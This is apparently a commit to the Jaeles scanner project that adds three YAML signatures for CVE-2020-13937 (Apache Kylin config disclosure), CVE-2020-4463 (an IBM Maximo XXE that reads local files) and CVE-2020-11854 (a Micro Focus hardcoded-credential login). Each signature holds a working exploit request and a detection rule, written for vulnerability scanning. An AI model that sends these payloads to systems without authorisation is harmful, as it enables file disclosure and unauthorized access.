Update some new cves

jaeles-project · Dec 21, 2020 · 409c9db · 409c9db
1 parent 9760f75
commit 409c9db
Show file tree

Hide file tree

Showing 3 changed files with 108 additions and 0 deletions.
diff --git a/cves/apache-kylin-config-disclosure-cve-2020-13937.yaml b/cves/apache-kylin-config-disclosure-cve-2020-13937.yaml
@@ -0,0 +1,21 @@
+id: apache-kylin-config-disclosure-cve-2020-13937
+info:
+  name: Apache Kylin config disclosure (CVE-2020-13937)
+  risk: High
+
+params:
+  - root: "{{.BaseURL}}"
+
+requests:
+  - method: GET
+    redirect: false
+    url: >-
+     {{.root}}/kylin/api/admin/config
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch('body', 'kylin.env') && StringSearch('resHeaders', 'application/json') && StringSearch('body', 'kylin.server')
+
+reference:
+  - link: https://starlabs.sg/advisories/20-13937/
diff --git a/cves/ibm-maximo-xxe-cve-2020-4463.yaml b/cves/ibm-maximo-xxe-cve-2020-4463.yaml
@@ -0,0 +1,63 @@
+id: ibm-maximo-xxe-cve-2020-4463
+info:
+  name: IBM Maximo Asset Management XXE (CVE-2020-4463)
+  risk: High
+
+params:
+  - root: "{{.BaseURL}}"
+
+replicate:
+  prefixes: 'maximo'
+
+requests:
+  - method: POST
+    redirect: false
+    url: >-
+      {{.root}}/meaweb/os/mxperson
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+      - Content-Type: application/xml    
+    body: |
+        <?xml version='1.0' encoding='UTF-8'?>
+        <!DOCTYPE foo [
+            <!ELEMENT foo ANY>
+            <!ENTITY xxe SYSTEM "file:///">
+        ]>
+        <max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>
+            <max:MXPERSONQuery>
+                <max:PERSON>
+                    <max:PERSONUID>&xxe;</max:PERSONUID>
+                </max:PERSON>
+            </max:MXPERSONQuery>
+        </max:QueryMXPERSON>
+    detections:
+      - >-
+        StatusCode() == 500 && StringSearch('response', 'Error 500: For input string') && StringSearch('response', 'bin')
+
+  - method: POST
+    redirect: false
+    url: >-
+      {{.root}}/meaweb/os/mxperson
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+      - Content-Type: application/xml    
+    body: |
+        <?xml version='1.0' encoding='UTF-8'?>
+        <!DOCTYPE foo [
+            <!ELEMENT foo ANY>
+            <!ENTITY xxe SYSTEM "file:///c:/">
+        ]>
+        <max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>
+            <max:MXPERSONQuery>
+                <max:PERSON>
+                    <max:PERSONUID>&xxe;</max:PERSONUID>
+                </max:PERSON>
+            </max:MXPERSONQuery>
+        </max:QueryMXPERSON>
+    detections:
+      - >-
+        StatusCode() == 500 && StringSearch('response', 'Error 500: For input string') && StringSearch('response', 'Windows')
+
+
+references:
+  - reference: https://github.com/Ibonok/CVE-2020-4463
diff --git a/cves/micro-focus-hardcode-cred-cve-2020-11854.yaml b/cves/micro-focus-hardcode-cred-cve-2020-11854.yaml
@@ -0,0 +1,24 @@
+id: micro-focus-hardcode-cred-cve-2020-11854
+info:
+  name: Micro Focus HardCode Credential (CVE-2020-11854)
+  risk: High
+
+params:
+  - root: "{{.BaseURL}}"
+
+replicate:
+  ports: '8443'
+
+requests:
+  - method: POST
+    redirect: false
+    url: >-
+      {{.root}}/ucmdb-ui/cms/loginRequest.do;?customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB
+    headers:
+      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+    detections:
+      - >-
+        StatusCode() == 200 && StringSearch("resHeaders", "LWSSO_COOKIE_KEY")
+
+references:
+  - link: https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md